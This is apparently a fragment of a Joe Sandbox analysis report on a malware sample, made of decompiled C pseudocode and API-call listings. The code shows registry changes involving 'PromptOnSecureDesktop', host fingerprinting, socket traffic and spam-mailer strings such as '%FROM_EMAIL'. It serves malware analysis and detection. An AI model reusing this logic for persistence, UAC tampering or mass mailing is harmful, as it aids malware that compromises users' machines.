                                                                                                                                  					}
                                                                                                                                  					if((_a4 & 0x00000001) != 0) {
                                                                                                                                  						_t46 = E0040DFE2(_t58, 1,  &_v8,  &_a8);
                                                                                                                                  						_t67 = _t67 + 0xc;
                                                                                                                                  						if(_t46 != 0) {
                                                                                                                                  							_t81 = _a8;
                                                                                                                                  							if(_a8 != 0) {
                                                                                                                                  								_t47 = E0040DBCF(_t81, 0x40000000, 2);
                                                                                                                                  								_pop(_t58);
                                                                                                                                  								_v12 = _t47;
                                                                                                                                  								if(_t47 != 0xffffffff) {
                                                                                                                                  									_t57 = _v8;
                                                                                                                                  									if(_t57 != 0 && _a8 != 0) {
                                                                                                                                  										E00402544(_t57, _t57, _a8, 0xe4, 0xc8);
                                                                                                                                  										_t67 = _t67 + 0x14;
                                                                                                                                  										if(WriteFile(_v12, _t57, _a8,  &_a8, 0) != 0) {
                                                                                                                                  											 *0x4136c0 =  *0x4136c0 & 0x00000000;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  									CloseHandle(_v12);
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if((_a4 & 0x00000002) == 0) {
                                                                                                                                  						L19:
                                                                                                                                  						goto L20;
                                                                                                                                  					}
                                                                                                                                  					_t34 = E0040DFE2(_t58, 2,  &_v8,  &_a8);
                                                                                                                                  					_t68 = _t67 + 0xc;
                                                                                                                                  					if(_t34 == 0 || _a8 == 0) {
                                                                                                                                  						goto L19;
                                                                                                                                  					} else {
                                                                                                                                  						E00402544(_v8, _v8, _a8, 0xe4, 0xc8);
                                                                                                                                  						_t36 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
                                                                                                                                  						_t38 = E0040E095(0x80000001, E00402544(0x4122f8, 0x4110bc, 0x14, 0xe4, 0xc8), _t36, _v8, _a8);
                                                                                                                                  						_t72 = _t68 + 0x50;
                                                                                                                                  						if(_t38 != 0) {
                                                                                                                                  							L17:
                                                                                                                                  							 *0x4136c0 =  *0x4136c0 & 0x00000000;
                                                                                                                                  							L18:
                                                                                                                                  							E0040EE2A(_t58, 0x4122f8, 0, 0x100);
                                                                                                                                  							E0040EE2A(_t58, 0x4128f8, 0, 0x100);
                                                                                                                                  							goto L19;
                                                                                                                                  						}
                                                                                                                                  						_t41 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
                                                                                                                                  						_t43 = E0040E095(0x80000001, E00402544(0x4122f8, 0x4110a0, 0x19, 0xe4, 0xc8), _t41, _v8, _a8);
                                                                                                                                  						_t72 = _t72 + 0x3c;
                                                                                                                                  						if(_t43 == 0) {
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						goto L17;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t31 = 1;
                                                                                                                                  				_t77 =  *0x4120ec - _t31; // 0x1
                                                                                                                                  				if(_t77 != 0) {
                                                                                                                                  					goto L21;
                                                                                                                                  				}
                                                                                                                                  				goto L2;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00000001,0040DAE0,00000000,00000000,00000000), ref: 0040E209
                                                                                                                                  • CloseHandle.KERNEL32(00000001,00000003), ref: 0040E21D
                                                                                                                                    • Part of subcall function 0040E095: RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                                                                    • Part of subcall function 0040E095: RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
                                                                                                                                    • Part of subcall function 0040E095: RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
                                                                                                                                    • Part of subcall function 0040E095: RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 4151426672-2980165447
                                                                                                                                  • Opcode ID: 42837028a0dd8996e6af557673b827ca3b7a00ccc3ddab19ba292c9f593e834e
                                                                                                                                  • Instruction ID: b34283ca0245a4d5345772c7626065eb71a791ff6ac24fd5689ebe733b27dfc9
                                                                                                                                  • Opcode Fuzzy Hash: 42837028a0dd8996e6af557673b827ca3b7a00ccc3ddab19ba292c9f593e834e
                                                                                                                                  • Instruction Fuzzy Hash: 5D41DB71940214BADB205E938C06FDB3F6CEB44754F1084BEFA09B41D2E6B99A60D6BD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00000001,00AD44E2,00000000,00000000,00000000), ref: 00ADE470
                                                                                                                                  • CloseHandle.KERNEL32(00000001,00000003), ref: 00ADE484
                                                                                                                                    • Part of subcall function 00ADE2FC: RegCreateKeyExA.ADVAPI32(80000001,00ADE50A,00000000,00000000,00000000,00020106,00000000,00ADE50A,00000000,000000E4), ref: 00ADE319
                                                                                                                                    • Part of subcall function 00ADE2FC: RegSetValueExA.ADVAPI32(00ADE50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 00ADE38E
                                                                                                                                    • Part of subcall function 00ADE2FC: RegDeleteValueA.ADVAPI32(00ADE50A,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 00ADE3BF
                                                                                                                                    • Part of subcall function 00ADE2FC: RegCloseKey.ADVAPI32(00ADE50A,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,00ADE50A), ref: 00ADE3C8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 4151426672-2980165447
                                                                                                                                  • Opcode ID: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                                                                  • Instruction ID: e431b7fde5a661188412b3017d7672bc9e83a0fed40b7ed367e3961116126bb9
                                                                                                                                  • Opcode Fuzzy Hash: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                                                                  • Instruction Fuzzy Hash: DE41DBB1D00204BAEB20BF519D46FEB3B6CDB14764F148027F91A98292E7B58A50DBB4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?), ref: 00AD83C6
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?), ref: 00AD8477
                                                                                                                                    • Part of subcall function 00AD69C3: SetFileAttributesA.KERNEL32(?,00000080), ref: 00AD69E5
                                                                                                                                    • Part of subcall function 00AD69C3: SetFileAttributesA.KERNEL32(?,00000002), ref: 00AD6A26
                                                                                                                                    • Part of subcall function 00AD69C3: GetFileSize.KERNEL32(000000FF,00000000), ref: 00AD6A3A
                                                                                                                                    • Part of subcall function 00ADEE95: GetProcessHeap.KERNEL32(00000000,?,00000000,00AD1DCF,?), ref: 00ADEEA8
                                                                                                                                    • Part of subcall function 00ADEE95: HeapFree.KERNEL32(00000000), ref: 00ADEEAF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesHeap$CloseFreeOpenProcessSize
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 359188348-2980165447
                                                                                                                                  • Opcode ID: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                                                                  • Instruction ID: 83c901d1cbb598d4c1bf5781275d38b7dd28f92cceb5616135bca7425568397f
                                                                                                                                  • Opcode Fuzzy Hash: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                                                                  • Instruction Fuzzy Hash: 794160B2900109BFEB11EBA49E81DFF777CEB04740F1444A7F516D6211FAB45E948BA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00ADE859,00000000,00020119,00ADE859,PromptOnSecureDesktop), ref: 00ADE64D
                                                                                                                                  • RegCloseKey.ADVAPI32(00ADE859,?,?,?,?,000000C8,000000E4), ref: 00ADE787
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 47109696-2980165447
                                                                                                                                  • Opcode ID: ca61599b3ee270ad7d52ab6b22e6fbb0cb95010ae32332e4c3022532ab02544e
                                                                                                                                  • Instruction ID: b1a07be45638ceb199f2d49b2e4510e028316b35dd5be4e407994108621bbb15
                                                                                                                                  • Opcode Fuzzy Hash: ca61599b3ee270ad7d52ab6b22e6fbb0cb95010ae32332e4c3022532ab02544e
                                                                                                                                  • Instruction Fuzzy Hash: 354128B2D0011DBFDF11EF94DD81DEEBBB9EB18304F104466F912A6250E3719E558B60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00ADAFFF
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00ADB00D
                                                                                                                                    • Part of subcall function 00ADAF6F: gethostname.WS2_32(?,00000080), ref: 00ADAF83
                                                                                                                                    • Part of subcall function 00ADAF6F: lstrcpy.KERNEL32(?,00410B90), ref: 00ADAFE6
                                                                                                                                    • Part of subcall function 00AD331C: gethostname.WS2_32(?,00000080), ref: 00AD333F
                                                                                                                                    • Part of subcall function 00AD331C: gethostbyname.WS2_32(?), ref: 00AD3349
                                                                                                                                    • Part of subcall function 00ADAA0A: inet_ntoa.WS2_32(00000000), ref: 00ADAA10
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                                                                  • String ID: %OUTLOOK_BND_
                                                                                                                                  • API String ID: 1981676241-3684217054
Uniqueness
Uniqueness Score: -1.00%

APIs
• ShellExecuteA.SHELL32(00000000,00000000,00000020,00000022,00000000,00000000), ref: 00AD9536
• Sleep.KERNEL32(000001F4), ref: 00AD955D
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: ExecuteShellSleep
• String ID:
• API String ID: 4194306370-3916222277
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTickCount.KERNEL32 ref: 00ADBB99
• InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CountIncrementInterlockedTick
• String ID: 0 v
• API String ID: 2903770966-3142137124
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTickCount.KERNEL32 ref: 00AD2995
• sendto.WS2_32(?,00412BF8,00000009,00000000,?,00000010), ref: 00AD2A69
  • Part of subcall function 00ADEE33: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00ADEE65,?,?,00AD1D75,?,?), ref: 00ADEE3A
  • Part of subcall function 00ADEE33: RtlAllocateHeap.NTDLL(00000000,?,00AD1D75), ref: 00ADEE41
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateCountProcessTicksendto
• String ID: 0 v
• API String ID: 1419455383-3142137124
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00ADB62C: wsprintfA.USER32 ref: 00ADB6CE
• GetTickCount.KERNEL32 ref: 00ADB9D9
• InterlockedIncrement.KERNEL32(00413648), ref: 00ADBA3A
• InterlockedIncrement.KERNEL32(?), ref: 00ADBA94
• GetTickCount.KERNEL32 ref: 00ADBB79
• GetTickCount.KERNEL32 ref: 00ADBB99
• InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
• closesocket.WS2_32(00000000), ref: 00ADBEB4
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CountIncrementInterlockedTick$closesocketwsprintf
• String ID: 0 v
• API String ID: 4077942794-3142137124
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTickCount.KERNEL32 ref: 00ADB9D9
• InterlockedIncrement.KERNEL32(00413648), ref: 00ADBA3A
• InterlockedIncrement.KERNEL32(?), ref: 00ADBA94
• GetTickCount.KERNEL32 ref: 00ADBB79
• GetTickCount.KERNEL32 ref: 00ADBB99
• InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
• closesocket.WS2_32(00000000), ref: 00ADBEB4
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CountIncrementInterlockedTick$closesocket
• String ID: 0 v
• API String ID: 1869671989-3142137124
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTickCount.KERNEL32 ref: 00ADB9D9
• InterlockedIncrement.KERNEL32(00413648), ref: 00ADBA3A
• InterlockedIncrement.KERNEL32(?), ref: 00ADBA94
• GetTickCount.KERNEL32 ref: 00ADBB79
• GetTickCount.KERNEL32 ref: 00ADBB99
• InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
• closesocket.WS2_32(00000000), ref: 00ADBEB4
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CountIncrementInterlockedTick$closesocket
• String ID: 0 v
• API String ID: 1869671989-3142137124
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTickCount.KERNEL32 ref: 00ADB9D9
• InterlockedIncrement.KERNEL32(00413648), ref: 00ADBA3A
• InterlockedIncrement.KERNEL32(?), ref: 00ADBA94
• GetTickCount.KERNEL32 ref: 00ADBB79
• GetTickCount.KERNEL32 ref: 00ADBB99
• InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
• closesocket.WS2_32(00000000), ref: 00ADBEB4
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CountIncrementInterlockedTick$closesocket
• String ID: 0 v
• API String ID: 1869671989-3142137124
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTickCount.KERNEL32 ref: 00ADB9D9
• InterlockedIncrement.KERNEL32(00413648), ref: 00ADBA3A
• InterlockedIncrement.KERNEL32(?), ref: 00ADBA94
• GetTickCount.KERNEL32 ref: 00ADBB79
• GetTickCount.KERNEL32 ref: 00ADBB99
• InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
• closesocket.WS2_32(00000000), ref: 00ADBEB4
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CountIncrementInterlockedTick$closesocket
• String ID: 0 v
• API String ID: 1869671989-3142137124
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 536389180-3142137124
                                                                                                                                  • Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                                                                  • Instruction ID: 10a0e7a8a972bd0d6959e8caac8a20bd629990511895c3881d8068f1fbc19008
                                                                                                                                  • Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                                                                  • Instruction Fuzzy Hash: E121B432614215AFDB10CFA8E985A9FBBB9FB05311B2540ABE806E7311DB39EE40D754
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTickwsprintf
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 2424974917-3142137124
                                                                                                                                  • Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                                                                  • Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
                                                                                                                                  • Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                                                                  • Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004038F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
    signed int _v8;
    signed int _t29;
    intOrPtr _t43;
    intOrPtr _t45;
    intOrPtr _t50;

    if(_a8 <= 0) {
        L14:
        return _t29;
    }
    _t29 = E004030FA(0x412c00);
    _v8 = 0;
    if(_a8 <= 0) {
        L13:
         *0x412c00 =  *0x412c00 & 0x00000000;
        goto L14;
    } else {
        do {
            _t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4))));
            _t45 =  *((intOrPtr*)(_t50 - 0x24));
            if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
                _t10 = _t50 - 0x1c;
                 *_t10 =  *(_t50 - 0x1c) - 1;
                if( *_t10 < 0) {
                     *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
                }
                 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
            }
             *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1;
            if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {
                _t43 = 2;
                 *((intOrPtr*)(_t50 - 0x20)) = _t43;
                 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
                _t34 =  *((intOrPtr*)(_t45 + 0x10));
                if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) {
                     *((intOrPtr*)(_t45 + 8)) = _t43;
                    if( *0x412bfc == 0) {
                        E00406509(_t34);
                         *0x412bfc = 1;
                    }
                }
            }
            _v8 = _v8 + 1;
            _t29 = _v8;
        } while (_t29 < _a8);
        goto L13;
    }
}

APIs
  • Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
  • Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
• GetCurrentThreadId.KERNEL32 ref: 00403929
• GetCurrentThreadId.KERNEL32 ref: 00403939
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CurrentThread$CountExchangeInterlockedTick
• String ID: %FROM_EMAIL
• API String ID: 3716169038-2903620461
• Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
• Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
• Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
• Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00AD70BC
• LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,?,?), ref: 00AD70F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Name$AccountLookupUser
• String ID: |
• API String ID: 2370142434-2343686810
• Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
• Instruction ID: dd4080308f00e6ae28771862cb43e19e145afb776af20ce7f1bbe6a0f1d66188
• Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
• Instruction Fuzzy Hash: B2112A72904118EBDF15CBD4DC85ADEB7BCBB04301F1443A6E502E62A0E7709F888BA0
Uniqueness

Uniqueness Score: -1.00%
C-Code - Quality: 60%
E00401B71() {
    long _v8;
    long _v12;
    void* _v27;
    char _v28;
    signed int _t12;
    signed int _t28;

    _v28 = 0;
    asm("stosd");
    asm("stosd");
    asm("stosd");
    asm("stosw");
    _v8 = 0;
    asm("stosb");
    _v12 = 0xf;
    _t12 = E00401AC3();
    GetComputerNameA( &_v28,  &_v12);
    GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0);
    _t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
    _v8 = _t28;
    if(_t28 == 0) {
        return E0040ECA5() & 0x7fffffff;
    }
    return _t28;
}

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                                                                    • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                                                                  • GetComputerNameA.KERNEL32 ref: 00401BA3
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 2777991786-1857712256
                                                                                                                                  • Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                                                                  • Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
                                                                                                                                  • Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                                                                  • Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
                                                                                                                                  				void* _t15;
                                                                                                                                  				long _t17;
                                                                                                                                  				signed int _t29;
                                                                                                                                  				long* _t31;
                                                                                                                                  
                                                                                                                                  				_t29 = 0;
                                                                                                                                  				if(_a8 > 0) {
                                                                                                                                  					do {
                                                                                                                                  						_t31 = _a4 + _t29 * 4;
                                                                                                                                  						_t17 =  *_t31;
                                                                                                                                  						if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {
                                                                                                                                  							 *((char*)(_t17 + 0x11)) = _a20;
                                                                                                                                  							lstrcpynA( *_t31 + 0x12, _a16, 0x3e);
                                                                                                                                  							 *((char*)( *_t31 + 0x4f)) = 0;
                                                                                                                                  							 *((char*)( *_t31 + 0x10)) = _a12;
                                                                                                                                  							if( *((char*)( *_t31 + 0x10)) != 2) {
                                                                                                                                  								_t17 = InterlockedIncrement(0x413640);
                                                                                                                                  							} else {
                                                                                                                                  								_t17 = InterlockedIncrement(0x41363c);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_t29 = _t29 + 1;
                                                                                                                                  					} while (_t29 < _a8);
                                                                                                                                  					return _t17;
                                                                                                                                  				}
                                                                                                                                  				return _t15;
                                                                                                                                  			}







                                                                                                                                  0x0040ab85
                                                                                                                                  0x0040ab8a
                                                                                                                                  0x0040ab94
                                                                                                                                  0x0040ab97
                                                                                                                                  0x0040ab9a
                                                                                                                                  0x0040aba0
                                                                                                                                  0x0040abab
                                                                                                                                  0x0040abb9
                                                                                                                                  0x0040abc4
                                                                                                                                  0x0040abca
                                                                                                                                  0x0040abd3
                                                                                                                                  0x0040abe1
                                                                                                                                  0x0040abd5
                                                                                                                                  0x0040abe1
                                                                                                                                  0x0040abe1
                                                                                                                                  0x0040abe1
                                                                                                                                  0x0040abe3
                                                                                                                                  0x0040abe4
                                                                                                                                  0x00000000
                                                                                                                                  0x0040abea
                                                                                                                                  0x0040abed

                                                                                                                                  APIs
                                                                                                                                  • lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
